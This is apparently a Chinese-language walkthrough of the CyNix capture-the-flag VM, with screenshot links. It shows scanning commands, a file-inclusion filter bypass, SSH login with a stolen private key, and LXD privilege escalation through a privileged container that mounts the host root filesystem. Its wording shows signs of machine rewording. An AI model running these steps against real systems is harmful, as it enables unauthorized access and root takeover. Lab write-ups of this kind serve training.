CyNix
主机发现1 netdiscover -i eth0 -r 192.168.15.0/24https://img2024.cnblogs.com/blog/3216597/202406/3216597-20240601094243672-1428407160.png
端口扫描
1 nmap -A -p- -sV 192.168.15.157https://img2024.cnblogs.com/blog/3216597/202406/3216597-20240601094504397-575190366.png
访问80端口
https://img2024.cnblogs.com/blog/3216597/202406/3216597-20240601094650722-797821584.png
目录扫描
1 gobuster dir -u http://192.168.15.157 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txthttps://img2024.cnblogs.com/blog/3216597/202406/3216597-20240601094845766-1029144394.png
访问/lavalamp子目录
https://img2024.cnblogs.com/blog/3216597/202406/3216597-20240601095039831-694462664.png
在CONCAT提交会出现一个空缺框
https://img2024.cnblogs.com/blog/3216597/202406/3216597-20240601095420824-1072097364.png
使用burp进行流量截取
https://img2024.cnblogs.com/blog/3216597/202406/3216597-20240601095956572-488768978.png
复制URL打开发现有内容被隐藏,修改数值为1.0即可表现
https://img2024.cnblogs.com/blog/3216597/202406/3216597-20240601100443669-1185157473.png
继承开启监听,发现参数是file,大概存在LIF漏洞
https://img2024.cnblogs.com/blog/3216597/202406/3216597-20240601100738532-2075698900.png
被过滤了不允许访问
https://img2024.cnblogs.com/blog/3216597/202406/3216597-20240601100946574-450892188.png
加上a成功绕过
https://img2024.cnblogs.com/blog/3216597/202406/3216597-20240601101150460-1054559796.png
发现可登录用户ford
https://img2024.cnblogs.com/blog/3216597/202406/3216597-20240601101407857-1747659085.png
采用另一个端口(6688)进行ssh连接
1 ssh ford@192.168.15.157 -p 6688 https://img2024.cnblogs.com/blog/3216597/202406/3216597-20240601101641420-408893821.png
表现关闭了暗码登录,所以需要一个私钥进行登录
补充说明:私钥一般和公钥放在一起,理论上都在用户的家目录中
https://img2024.cnblogs.com/blog/3216597/202406/3216597-20240601101907918-1727180622.png
复制私钥并赋予公道的权限再次进行连接
https://img2024.cnblogs.com/blog/3216597/202406/3216597-20240601102643542-1416308947.png
获取到第一个flag
https://img2024.cnblogs.com/blog/3216597/202406/3216597-20240601102759587-249603825.png
使用LinEnum工具进行提权
链接:https://github.com/rebootuser/LinEnum
把当前目录利用python进行发布
https://img2024.cnblogs.com/blog/3216597/202406/3216597-20240601103625579-1396945906.png
在靶机上下载脚本,赋予实验权限后实验脚本
https://img2024.cnblogs.com/blog/3216597/202406/3216597-20240601104215647-1429627107.png
再次补充:
LXD、LXC 和 Docker 是三种不同的容器化技术,它们在实现和使用上有一些区别。
总结来说,LXD是基于LXC的系统级容器管理器,提供了更高级别的接口和管理工具;LXC是Linux内核提供的一种假造化技术,允许在单个Linux内核上运行多个隔离的用户空间实例;而Docker是基于LXC的容器化平台,提供了一套简化容器构建、分发和运行的工具和API。
LXD提权原理:LXD 是基于 LXC 容器的管理程序,当前用户可操作容器。所以用户可创建一个容器,再用容器挂载宿主机磁盘,最后使用容器权限操作宿主机磁盘内容达到提权效果。
LXD 提权条件: 已经获得 shell 用户属于 lxd 组
查看镜像列表
1 lxc image listhttps://img2024.cnblogs.com/blog/3216597/202406/3216597-20240601110944833-1471275411.png
按照实际环境,需要创建一个特权镜像,但每每会失败,所以这里选择在kali天生镜像,然后复制到靶机上面
先在kali上面下载alpine,然后天生镜像
链接:https://github.com/saghul/lxd-alpine-builder
https://img2024.cnblogs.com/blog/3216597/202406/3216597-20240601105737714-1346179657.png
发布当前目录,在靶机上进行复制
https://img2024.cnblogs.com/blog/3216597/202406/3216597-20240601110923977-744589406.png
导入镜像并对其重定名
1 lxc image import alpine-v3.20-x86_64-20240531_2302.tar.gz --alias hackerhttps://img2024.cnblogs.com/blog/3216597/202406/3216597-20240601111353534-69316585.png
创建容器
1 lxc init hacker hacker -c security.privileged=truehttps://img2024.cnblogs.com/blog/3216597/202406/3216597-20240601111542968-107578121.png
将容器hacker挂载到 /mnt/root 下
1 lxc config device add hacker hacker disk source=/ path=/mnt/root recursive=truehttps://img2024.cnblogs.com/blog/3216597/202406/3216597-20240601111959051-1910802958.png
启动容器
1 lxc start hacker与主机进行交互
1 lxc exec hacker /bin/shhttps://img2024.cnblogs.com/blog/3216597/202406/3216597-20240601112158484-1471680450.png
获取到第二个flag
https://img2024.cnblogs.com/blog/3216597/202406/3216597-20240601112411865-37590481.png
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]